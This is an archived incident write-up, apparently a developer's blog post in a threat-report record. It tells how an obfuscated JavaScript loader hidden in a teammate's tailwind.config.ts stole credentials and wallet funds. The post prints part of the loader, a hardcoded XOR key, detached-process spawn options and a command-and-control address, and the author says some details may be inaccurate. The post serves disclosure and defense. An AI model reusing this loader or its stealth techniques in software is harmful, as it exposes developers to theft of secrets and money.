{
	"id": "01587359-27e2-472f-ada3-2e82912a7e82",
	"created_at": "2026-04-06T00:06:50.84842Z",
	"updated_at": "2026-04-10T03:20:43.256784Z",
	"deleted_at": null,
	"sha1_hash": "1e11156cc02ce7d8483f8580878d68c3a3e82359",
	"title": "that one time i got hacked: a security incident breakdown",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 67464,
	"plain_text": "that one time i got hacked: a security incident breakdown\r\nBy Kushagra Sarathe\r\nPublished: 2025-09-30 · Archived: 2026-04-05 16:30:07 UTC\r\nthe setup\r\nafter practicing cybersecurity and bug bounty hunting for about 2 years, i thought i had my security game pretty\r\nlocked down. i've been in tech for over 5 years now, always paranoid about security practices, using 2fa\r\neverywhere, being careful about what i click and what i run. this was my first time getting properly owned, and\r\nhonestly, it was a humbling experience.\r\nwhat happened\r\nit started with what seemed like a normal pre-release day. we had a big production deployment scheduled for the\r\nnext day for ethcc, and one of my teammates had a pr open fixing some bugs related to currency within the app.\r\nthe pr wasn't merged yet, but we needed to be absolutely sure everything worked perfectly before the conference.\r\nso i pulled his branch locally to smoke test all our critical user flows. standard practice before major releases.\r\nas a frontend developer, pnpm dev is muscle memory. pull code, start server, test changes. except this time,\r\nhidden in the tailwind.config.ts file, was a heavily obfuscated javascript payload. my teammate later told me his\r\nide didn't even show this change in the git diff when he was pushing the code.\r\ni was being extra thorough because of the high-stakes deployment. ironically, that thoroughness - pulling and\r\ntesting an unmerged branch - is exactly what got me compromised. everything looked normal at first glance. just\r\nsome standard bug fixes. but the moment i ran that dev server, i was done.\r\nthe fundamental problem here's what really sucks about this situation: running other devs' code is completely\r\nnormal workflow. it's not some edge case or bad practice - it's literally how development works. you pull a\r\nteammate's branch, run it locally, test it, leave comments. multiple times a day, every day.\r\nand yet, this is one of the fastest attack vectors to compromise an entire dev team. the measures to tackle it? they\r\nmostly suck. you can sandbox your dev environment, but that adds friction to your workflow. you can enforce\r\nstricter reviews, but legitimate code can still hide malicious payloads in config files or dependencies. you can\r\nrequire all branches to be scanned, but obfuscated code often passes automated checks.\r\nit's fundamentally a hard problem. we trust our teammates, we trust our tools, and we operate at a pace that makes\r\nparanoid verification of every single line impractical. attackers know this. they exploit the trust and speed that\r\nmakes modern development possible.\r\nmy attack wasn't sophisticated because of the malware itself - it was sophisticated because it targeted the one\r\nworkflow we can't easily lock down without grinding to a halt.\r\nhttps://kuxhagra.com/posts/that-one-time-i-got-hacked/\r\nPage 1 of 5\n\nthe attack vector\r\nthe malicious code was sophisticated. when i ran the dev server, it:\r\n1. fetched additional malicious code from a blockchain transaction on bsc (binance smart chain)\r\n2. downloaded a 32.4kb executable from github\r\n3. read all our environment variables (database credentials, api keys, jwt secrets, you name it)\r\n4. extracted saved passwords from chrome's encrypted storage\r\n5. executed system commands\r\n6. spawned detached node processes to avoid detection\r\n7. cleaned up after itself\r\ndiving deeper into the payload\r\nhere's the actual malicious script that was hidden in our tailwind.config.ts file:\r\nglobal[\"_V\"] = \"7-facus7029\";\r\nglobal[\"r\"] = require;\r\n(function () {\r\n var Jex = \"\",\r\n CoP = 394 - 383;\r\n function rKj(c) {\r\n var p = 289187;\r\n var m = c.length;\r\n var o = [];\r\n for (var e = 0; e \u003c m; e++) {\r\n o[e] = c.charAt(e);\r\n }\r\n for (var e = 0; e \u003c m; e++) {\r\n var q = p * (e + 138) + (p % 48794);\r\n var u = p * (e + 384) + (p % 46631);\r\n var s = q % m;\r\n var n = u % m;\r\n var i = o[s];\r\n o[s] = o[n];\r\n o[n] = i;\r\n p = (q + u) % 3489505;\r\n }\r\n return o.join(\"\");\r\n }\r\n // ... heavily obfuscated code continues ...\r\n})();\r\nlooking at this mess, you can see it's completely obfuscated - just a wall of random characters and function calls\r\nthat means nothing to human eyes. it used multiple layers of string encryption and function constructors to hide its\r\nhttps://kuxhagra.com/posts/that-one-time-i-got-hacked/\r\nPage 2 of 5\n\ntrue purpose. when executed:\r\nstep 1: blockchain payload retrieval\r\nthe script made a request to fetch a specific transaction:\r\ninside this transaction's input data was base64-encoded malicious code. the script decoded it using a hardcoded\r\nxor key: $v$5;kmc$ldm*5SA .\r\nstep 2: process spawning and persistence\r\nonce decoded, the script spawned a detached node process using child_process.spawn() with the following\r\noptions:\r\n{\r\n detached: true,\r\n stdio: 'ignore',\r\n windowsHide: true\r\n}\r\nthis made the malicious process run independently of the original server start process, making it harder to detect\r\nand kill.\r\nstep 3: data exfiltration\r\nthe final payload established communication with a command \u0026 control server at\r\nhttp://23.27.20.143:27017/$/boot (hosted on ace data centers/evoxt uk)\r\nthe script systematically:\r\nenumerated environment variables\r\naccessed chrome's encrypted password storage\r\nexecuted system commands\r\nall while running silently in the background as i continued my normal development work.\r\nohh btw if you want to take a look at the binary code, i think it was this\r\nthe damage\r\nthe immediate impact was:\r\nall three of us (devs) had to completely wipe and reset our compromised machines\r\nthe teammate who was first compromised and whose pr is ran locally had to do reset his device twice\r\nbecause he got reinfected\r\ni lost a HUGE amount of money drained from my hot wallets - money i had kept for emergency purpose\r\nand my last month's salary\r\nhttps://kuxhagra.com/posts/that-one-time-i-got-hacked/\r\nPage 3 of 5\n\nwe lost about 6 working days total dealing with the cleanup\r\nhad to rotate all exposed api keys, database credentials, and secrets\r\nthe financial hit was the worst part. as a developer, i had gotten comfortable with my routine of spinning up dev\r\nservers constantly. i never imagined that something as mundane as running a dev server could lead to losing\r\nmoney. it's a harsh reminder that in our industry, the tools we use daily can become weapons in the wrong hands.\r\nbut it could have been much worse. if we hadn't caught it quickly, that malicious code could have made it to\r\nproduction.\r\nhow they got in\r\nfrom what i was able to track initially, my stolen funds went through multiple swaps and bridges across different\r\nblockchain networks - a classic money laundering technique to obscure the trail. the attackers moved quickly to\r\nconvert everything through some cross-chain bridges to make the funds nearly impossible to trace.\r\nbut after a while, i had to stop investigating. diving deeper into tracking where exactly my money went and\r\nanalyzing the attack patterns was starting to affect my mental health. it felt like reopening the wound every time i\r\nlooked at transaction hashes and wallet addresses. the combination of losing that much money and realizing how\r\ncompletely i'd been violated by this malware running on my machine was honestly giving me ptsd.\r\ni made the decision to move on rather than obsess over every detail of how my funds were moved around. i\r\nwouldn't be lying if i say i'm still recovering from this whole thing mentally and financially\r\nthe aftermath\r\nwe immediately implemented several security measures:\r\nremoved auto-deploy from vercel\r\nenforced 2fa for all team members across all services\r\nadded more branch protection rules\r\nrotated all exposed keys and secrets\r\nremoved direct access to deployment environments\r\ntemporarily removed all the affected devs from all the services\r\nenforced stricter code review processes\r\nlessons learned\r\neven when you think you're being careful, modern attack vectors are incredibly sophisticated. the combination of\r\nsupply chain attacks (compromised dependencies), social engineering (trusted teammate's account), and tight\r\ndeadline for prod releae made this almost impossible to detect until it was too late.\r\nwhat really got me was how normal everything felt. i was just doing what i do every single day as a dev - pull\r\ncode, run the server, test features. the attack leveraged the most routine part of my workflow. that's what made it\r\nso effective and so devastating.\r\nhttps://kuxhagra.com/posts/that-one-time-i-got-hacked/\r\nPage 4 of 5\n\nmoving forward\r\nthis experience reinforced why security can never be an afterthought. no matter how paranoid you think you are,\r\nattackers are constantly evolving their techniques. the key takeaways:\r\nalways verify unusual commits, even from trusted team members\r\nbe suspicious of any code that seems unnecessarily complex or obfuscated\r\nimplement proper branch protection and review processes\r\nand the list would go long...\r\np.s. since i did not proceed with investigating the hack all the way till end, some of the info in this post might not\r\nbe 100% accurate. i used my notes from back when i was hacked to write this post\r\nthanks to\r\njota : for helping with inital investigation\r\ngowtham \u0026 rcx86 : for helping with looking into malicious binary code\r\ngetting hacked sucks. stay safe out there.\r\nSource: https://kuxhagra.com/posts/that-one-time-i-got-hacked/\r\nhttps://kuxhagra.com/posts/that-one-time-i-got-hacked/\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://kuxhagra.com/posts/that-one-time-i-got-hacked/"
	],
	"report_names": [
		"that-one-time-i-got-hacked"
	],
	"threat_actors": [],
	"ts_created_at": 1775434010,
	"ts_updated_at": 1775791243,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1e11156cc02ce7d8483f8580878d68c3a3e82359.pdf",
		"text": "https://archive.orkl.eu/1e11156cc02ce7d8483f8580878d68c3a3e82359.txt",
		"img": "https://archive.orkl.eu/1e11156cc02ce7d8483f8580878d68c3a3e82359.jpg"
	}
}